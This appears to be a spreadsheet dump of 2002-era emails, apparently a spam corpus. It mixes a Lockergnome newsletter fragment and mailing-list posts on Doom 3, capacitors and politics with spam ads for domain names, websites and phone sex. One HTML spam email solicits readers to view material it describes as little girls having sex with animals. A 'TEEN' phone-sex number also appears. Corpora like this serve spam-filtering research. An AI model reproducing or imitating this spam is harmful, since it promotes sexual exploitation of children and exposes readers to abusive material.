 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Yadnus for &lt;a title="Winamp 2.x  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=winamp2" &gt;Winamp 2.x&lt;/a&gt;&lt;/b&gt; by mc&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/22/02 2:02PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/13132.gif" ALT="Winamp 2.x by mc"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Yadnus" HREF="http://www.deskmod.com/?download=13132" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=13132" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;p class="url" align="right"&gt;Get your copy of &lt;a href=" https://store.stardock.com/AddProduct.asp?PRODUCT_ID=ESD-SDS-W051&amp;REFERER=lockergnome"&gt;SkinStudio XP&lt;/a&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Rexway&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://artists.mp3s.com/artists/56/rexway.html"&gt;http://artists.mp3s.com/artists/56/rexway.html&lt;/a&gt;&lt;p&gt;
 Blending punk rock attitude with country twang makes for a fairly 
 unique musical experience. I saw these guys play a show in Omaha, 
 back in January of this year and was blown away by their stage 
 presence. Rexway rip through an opening set with enough energy to 
 kick-start even the most somber crowd, moving everyone in the 
 audience to their feet and setting the scene for an entertaining 
 evening. As with most punk, the lyrics are equal parts politics 
 and angst, with enough colorful language to drop a jaw or two. 
 Tool fans should check out the countrified version of the classic 
 HWAP; it's kind of like a cover tune, only more unique. If you 
 are offended by 4-letter words, this band isn't for you. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Get the privacy of your own office without the promotion.&lt;/b&gt; 
 Keep what you do on your PC private.
 Hide windows instantly, clear cache, cookies, history &amp; more!
 Get a virtual Panic Button for your PC!
 &lt;a href="http://hop.clickbank.net/?lgnome/panicware"&gt;Try it today&lt;/a&gt;!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;MEXP&lt;/b&gt;&lt;br&gt;
 For Winamp&lt;p&gt;
 &lt;a class="url" href="http://www.mexp.dk"&gt;http://www.mexp.dk&lt;/a&gt;&lt;p&gt;
 If you ever used Mp3 Archive with Winamp, you're already familiar with 
 the concept behind this plug-in. Organize, search, and catalog your 
 music collection. List artists in a tree view, complete with 
 sub-headings for each song or album (depending on personal 
 configuration). Additional details about your song listings appear in 
 the right-hand pane. Also includes an Id3 tag editor, CDDB integration 
 for simplifying tag edits, and Lyrics database support. Try it free for 
 30-days, if you feel more organized, register MEXP for either 14-bucks 
 or 14-Euros. 
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://www.amazon.com/exec/obidos/ASIN/B00005NYFS/ref=ase_lockergnomedigit"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/croupier.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Croupier&lt;/b&gt; (NR) 1998&lt;br&gt;
 Drama - 94min&lt;br&gt;
 Reviewer's Tilt (9)&lt;p&gt;
 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;
 &lt;p class="url"&gt;Special DVD Features worth a look-Deleted scenes&lt;/p&gt;
 In disembodied first person Clockwork style narration,  Croupier
 pessimistically compares our lives to those of hapless casino gamblers.
 We know the odds are stacked against us, yet we continue to play the
 games. Gamblers, or "punters" as they are more derogatorily known,
 however, play their games under the watchful eyes of the croupier
 (casino dealer).  Constantly pulled by the siren song of fast money, the
 croupier knows better than anyone that to play is to lose. Thus, the
 cool croupier relegates himself to his addiction of watching others
 lose. Jack Manfred (Clive Owen) is the croupier, raised by his croupier
 father (Nicholas Ball) who taught him all the tricks of the trade.
 Through his losses both in the casino and in his personal life, Jack's
 father also taught Jack that the only way to win is not to play. Punters
 are sorry sods; the croupier is king. From father to son, the lesson
 passes -- watching others strive and falter is the only real enjoyment
 in life. Despite decades of croupier training, Jack is compelled to
 write the great novel burning deep inside him, yearning to escape.
 Jack's publisher regrettably relates to Jack that his novel idea is
 trite; stories of real life graft and corruption are what sell. When
 Jack's father informs Jack of a casino opening in a small London Casino,
 Jack snatches the opportunity to parlay his skill into a novel exposing
 the seedy underbelly of London's casinos. Unfortunately, Jack's ex-cop
 girlfriend sees the job hardening and irreparably changing Jack for the
 worst. In an attempt to fool himself, Jack creates alter ego "Jake" to
 bear the brunt of inequity, attempting to maintain Jack both morally and
 physically unscathed. The absence of any clear delineation between the
 personas becomes apparent when a lovely punter (Alex Kingston)
 approaches Jack with a scheme to rob the casino. Jack slowly comes to
 the realization that no one can have it both ways, either in the casino
 or in life. You are either in the game, or you are not. Seasoned veteran
 director Michael Hodges deftly crafts this tale around the subtle
 talents of the ultra cool Clive Owen. Owen rules this drama, not with
 flex and volume, but with glances and nods. Less is truly more, much
 more, in this low budget escape from the unsatisfying blockbuster
 suspense films of recent memory. Croupier proves that it is not a large
 budget, but direction, dialogue and acting that drive the genre.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
 &lt;li&gt;Format: Color, Widescreen Anamorphic, Closed Captioned
 &lt;li&gt;Sound: Dolby Digital 2.0 Stereo
 &lt;li&gt;Deleted Scenes
 &lt;/ul&gt;
 &lt;p class="url" align="right"&gt;Review by &lt;a href="mailto:brett@lockergnome.com?subject=DVD Review Feedback"&gt;Brett Trout&lt;/a&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Surgenate for &lt;a title="WallPapers Website" target=_blank HREF="http://www.wincustomize.com" &gt;WallPapers&lt;/a&gt;&lt;/b&gt; by MooShoo&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="/images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on 7/22/2002 12:35:00 AM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;&lt;center&gt;
 &lt;img BORDER=0 SRC="http://www.wincustomize.com/library/accounts/MooShoo/wallpapers/tSurgenate.jpg" ALT="Surgenate by MooShoo"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Surgenate" HREF="http://www.wincustomize.com/skins.asp?flags=skinid=4035|library=8|file=Surgenate.zip|p=lg" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.wincustomize.com/library/accounts/MooShoo/wallpapers/Surgenate.jpg" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit WinCustomize" target=_blank HREF="http://www.wincustomize.com/skins.asp?library=8&amp;SkinID=4035" &gt;Visit WinCustomize&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020722.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020722.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend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href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get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href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail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&lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=4l28ge"
 target=_blank&gt;&lt;b&gt;Webasters Protest With The Blues&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Internet radio stations will sing the blues...literally...over music royalty rates, which the operators say are...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1t40no"
 target=_blank&gt;&lt;b&gt;VMAs On Their Way&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 This year's MTV Video Music Awards will be hosted by Saturday Night Live newsman Jimmy Fallon. Bruce Springsteen and...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1s19th"
 target=_blank&gt;&lt;b&gt;Short List Prize's long List&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Beck, the Neptunes and Metallica's Lars Ulrich are all up for this year's Shortlist Music Project. The boys from The...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1y23co"
 target=_blank&gt;&lt;b&gt;Coldplay On Ice?&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 If you're a Coldplay fan, you better not wait too long to buy their latest release, A Rush Of Blood To The Head...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=4l27ge"
 target=_blank&gt;&lt;b&gt;Actor Says Rappers Should Rap, Not Act&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Actor Samuel L. Jackson says he won't even look at a script that turns rap artists into movie stars. He calls the...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1y12p"
 target=_blank&gt;&lt;b&gt;P. Diddy Sued By Songwriters&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Sean "P. Diddy" Combs and his Bad Boy Entertainment are being sued by three songwriters who say they were never paid... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif"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
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Doom 3
</t>
  </si>
  <si>
    <t xml:space="preserve">Doom 3 will be based on a peer to peer architecture says
 CmdrTaco quoting Ant quoting Carmack.  
 Greg
 http://slashdot.org/article.pl?sid=02/08/25/1310220
 DOOM 3 will use P2P System?
            Posted by CmdrTaco on Sunday August
            25, @09:19AM
            from the
            i'll-believe-it-when-I'm-fragged-on-it
            dept.
            Ant writes "From Page 6 of FiringSquad's
            QuakeCon 2002 Postmortem article: John Carmack said
            something at the end of the Q&amp;A about how the
            multiplayer will be only four players? Tim: After 2 hours of
            talking up at the podium, sometimes you leave a few details
            out. Doom 3 multiplayer will be fully scalable. It will be a
            peer to peer system. We haven't started working on it yet.
            Tell everyone not to panic - it will be fine. John just forgot
            to mention it'll be scalable past four players. It's hard to
            give a hard number because we haven't started working on
            it yet. Right now we're focused on making Doom 3 a
            kickass, over the top single player game."
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: curb your celebrity
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000622
 Date: 2002-09-30T17:28:45-06:00
 Aaron Warchalker will probably be on Public Radio's Marketplace tomorrow 
 evening. I tried to cut down on the number of "you know"s but I didn't do too 
 well. :-( I'll keep trying.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call me                    16540
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello I am your hot lil horny toy.
     I am the one you dream About,
     I am a very open minded person,
     Love to talk about and any subject.
     Fantasy is my way of life, 
     Ultimate in sex play.
      Ummmmmmmmmmmmmm
      I am Wet and ready for you.
      It is not your looks but your imagination that matters most,
      With My sexy voice I can make your dream come true...
      Hurry Up! call me let me Cummmmm for you..........................
 TOLL-FREE:             1-877-451-TEEN (1-877-451-8336)
 For phone billing:     1-900-993-2582
 -- 
 _______________________________________________
 Sign-up for your own FREE Personalized E-mail at Mail.com
 http://www.mail.com/?sr=signup
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jeremy Allaire: Wholistic Web Services.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:27:17AM
 Date: Tue, 24 Sep 2002 18:27:17 GMT
 Jeremy Allaire: Wholistic Web Services[1].
 [1] http://radio.weblogs.com/0113297/stories/2002/09/24/wholisticWebServices.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $14.95 per year domain names
</t>
  </si>
  <si>
    <t xml:space="preserve">AFFORDABLE DOMAIN REGISTRATION FOR EVERYONE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http://www.domainsforeveryone.com/ today for more info.
 Register your domain name today for just $14.95 at: http://www.domainsforeveryone.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Domains For Everyone
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (f4)5088VukL9-796qVfq4651flcG5-695tl29
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Hanson's Sept 11 message in the National Review
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 19, 2002 at 11:11:47AM -0400, Bill Stoddard wrote:
 &gt; people? Either these folks are social misfits who have no understanding of
 &gt; human interactions (else they would try more constructive means to get their
 &gt; message across) or they are just out to get their rocks off regardless of
 &gt; how it affects other people, and that is immoral at best and downright evil
 &gt; at worst.
 Are you kidding? It was fucking BRILLIANT. Do you know what exposure that got
 them? They sat perfectly so that the cameras could focus on the mildly 
 exasperated Rumsfeld and their "UN Inspections not war" banner. That picture
 will be dominating the news cycles in China, Iraq, Russia, Germany, and 
 France, at least. For goodness sakes, you're arguing about it on FoRK. In 
 politics by sound-bite, those two rude hags kicked ass and took names.
 For the record, I don't think they even got arrested, which is a shame. It
 is part of the game -- make an ass of yourself, get your point on the nightly
 news, spend a couple days in the clink for disorderly.
 -- 
 njl
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get your own genome, feed your hypochondria
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485739
 Date: Not supplied
 For UK#400,000, a bioresearcher will map your personal genome for you. As 
 geneticists discover more markers for congenital diseases, you can compare them 
 to your genome and learn what you're in for in your lifetime -- heart disease, 
 cancer, baldness, compulsive hand-washing... Link[1] Discuss[2] (_Thanks, Alan!
 _)
 [1] http://timesofindia.indiatimes.com/cms.dll/articleshow?artid=23099123
 [2] http://www.quicktopic.com/boing/H/86aYt8PFwKE6
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: i know!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Nasty Farm Girls!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#660000" text="#FFFFFF" link="#FFFF00" vlink="#FFFF00" alink="#CC6600"&gt;
 &lt;table width="100%" border="0" bgcolor="#660000"&gt;
   &lt;tr&gt; 
     &lt;td&gt; 
       &lt;div align="center"&gt; 
         &lt;p&gt;&lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;img src="http://66.64.68.157/farm_loving/images/odd001.gif" width="300" height="200" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;table width="600" border="0" bgcolor="#660000"&gt;
           &lt;tr&gt; 
             &lt;td&gt; 
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;img src="http://66.64.68.157/farm_loving/images/odd003.gif" width="125" height="220" align="left" border="0"&gt;&lt;/a&gt;&lt;font color="#FFFFFF" size="3"&gt;Hey Baby,&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="3"&gt;Are 
                 you a sick Fuck??? Do you like watching&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt; 
                 &lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;font color="#FFFF00"&gt;little 
                 girls FUCKING with their animals&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt;??? 
                 That's what we thought! We know what you want!&lt;/font&gt; &lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;font color="#FFFF00"&gt;This 
                 shit&lt;/font&gt;&lt;/a&gt; &lt;font color="#FFFFFF"&gt;has been banned in ALL 50 
                 States, and Canada! But we are bringing it too you via a&lt;/font&gt; 
                 &lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;font color="#FFFF00"&gt;special 
                 offer&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt;! Wanna watch these nasty 
                 farm girls with their animals? Then you have to&lt;/font&gt; &lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;font color="#FFFF00"&gt;check 
                 this nasty shit out&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt;! It is a 
                 must see!&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="3"&gt;XoXoXoXoXo&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="3"&gt;Cassie&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="3"&gt;P.S. 
                 If you really wanna watch these girls fuck around with their farm 
                 animals click&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt; 
                 &lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;font color="#FFFF00"&gt;here 
                 now&lt;/font&gt;&lt;/a&gt;!&lt;/font&gt;&lt;/p&gt;
               &lt;p align="center"&gt;&lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;&lt;img src="http://66.64.68.157/farm_loving/images/702.gif" width="468" height="60" border="0"&gt;&lt;/a&gt;&lt;br&gt;
                 &lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://66.64.68.157/farm_loving/index.htm"&gt;TOTALLY 
                 FUCKED UP FARM GIRL LOVING! NASTY SHIT THAT IS GROSS!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;p align="left"&gt;&lt;font color="#FFFFFF" face="Arial, Helvetica, sans-serif" size="2"&gt;To 
           Be purged from all future mailings please click below:&lt;/font&gt;&lt;/p&gt;
         &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#FFFFFF"&gt;&lt;a href="http://66.64.68.157/free_for_life/purge.html"&gt;CLICK 
           HERE!&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Electric car an Edsel...
</t>
  </si>
  <si>
    <t xml:space="preserve">Ouch.... hooooo....
 Cheers,
 RAH
 --- begin forwarded text
 Status: RO
 Date: Thu,  5 Sep 2002 09:17:13 -0700
 From: Same Guy
 Subject: Re: Electric car an Edsel...
 To: "R. A. Hettinga"  &lt;rah@shipwright.com&gt;
 Bob,
 This guy's an idiot.
 I design loads for systems with the 50 kV capacitors.  One of those has 864
 of such capacitors and stores only 10 megajoules, which means 11 kilojoules
 each.  They weigh 125 kg.
 You need high energy per unit mass, and the capacitive system I picked
 maximizes that.
 It is precisely the system that Maxwell is touting for electrical braking
 and power augmentation for regenerative use in automobiles.  You also need
 voltage you can use in a DC motor, which is why though the actual
 capacitors in the system are charged to 2.5 volts, the system has them
 arranged in series to boost the voltage.
 Ignore him.  He's a waste of my time.
 &lt;Somebody's .sig&gt;
 ------------------------
   From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
   Subject: Re: Electric car an Edsel...
   Date: Wed, 4 Sep 2002 15:31:39 -0400
   To: Some people...
 --- begin forwarded text
 Status: RO
 Date: Wed, 4 Sep 2002 07:59:10 -0700 (PDT)
 From: "Adam L. Beberg" &lt;beberg@mithral.com&gt;
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 cc: &lt;fork@example.com&gt;
 Subject: Re: Electric car an Edsel...
 On Wed, 4 Sep 2002, R. A. Hettinga wrote:
 &gt; Maxwell (www.maxwell.com) makes and sells high energy density capacitors,
 &gt; called ultracapacitors.  They deliver them in an air-cooled, voltage
 &gt; regulated module that will charge to 42 V and hold 128 kilojoules -- roughly
 &gt; the energy in 2 teaspoons of sugar or a bite of a donut -- and weighs 16
 &gt; kilograms.  If that electrical energy could all be converted to kinetic
 &gt; energy, there's enough to get the capacitor module up to about 200 mph -- in
 &gt; a vacuum.
 Since the energy you can pack into a capacitor is something like
 1/2*C*(V^2), you want to design your system with the lowest voltage possible
 to fully exploit that V^2 ;) So yea, a 42V system will only be useful for
 accelerating insects, not cars. That must be why 40kV is standard not 42.
 (the joke of putting 42 into goggle to find that model was not missed BTW)
 Most production systems use a mix of batteries and capacitors, as very few
 real world applications run for less then 10 seconds like the car we were
 talking about originally. Even 10 seconds is pushing the "capactior is the
 wrong choice" limits. Thats why the landspeed record model is a battery one,
 it's got to run for a much longer period of time and needs a steady
 discharge curve.
 But it should be safe to say that most people want the Indy 500 version, not
 the 1/4 mile sprint version when they are looking for a vehice :) For those
 you dont want a battery or a capacitor, you want to take advantage of whole
 atoms, not just electrons. Then you can suck off the electrons you need with
 a fuel cell. However, you will use both capacitors for the braking/accel,
 and batteries to not just dump excess energy in the design.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com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---------------End of Original Message-----------------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</si>
  <si>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Re: spam maps
</t>
  </si>
  <si>
    <t xml:space="preserve">Lucas Gonze wrote:
 &gt;&gt;- Joe
 &gt;&gt;
 &gt;&gt;P.S. I hate everybody.
 &gt; 
 &gt; one up: I hate everything post-(the first ten seconds of the universe),
 &gt; but especially everybody and everything, and including but not limited to
 &gt; puppies and ice cream.
 And you. I especially hate you.
 - Joe
 -- 
 There is no place in which to hide
 Even truth is filled with lies
 Doubting angels fall to walk among the living
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ecstasy users 'risk Parkinson's disease'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8289788,1440/
 Date: Not supplied
 People using the drug for just one night could be affected, researchers claim, 
 but others experts are highly sceptical
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Xine Dependencies
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Matthias...After installing those packages Xine now installs
 fine.  Guess I shoulda figured that one out...
 Thanks...
 QuaffAPint
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Colophon 1
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_1
 Date: 2002-10-01T00:11:05-05:00
 _Jason Gurley_: Rap Sheet[1]. &amp;#8220;I once played drums in a band with no name 
 that never played a single gig anywhere.&amp;#8221;
 [1] http://www.deeplyshallow.com/archive/000426.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: - Custom Websites for $399 Complete! (1709D@5)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Beautiful,Custom Websites for $399 Complete!&lt;/TITLE&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/head&gt;
 &lt;BODY text=#000000 vLink=#000080 aLink=#000080 link=#000080 bgColor=#000080 
 topMargin=7&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=#000000 height=368 cellSpacing=0 cellPadding=3 width=575 
 bgColor=#79a5ff border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=565 bgColor=#000000 height=22&gt;
       &lt;P align=center&gt;&lt;FONT face=Arial color=#ffffff&gt;&lt;B&gt;Beautiful, 100% Custom 
       Websites, $399 Complete!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
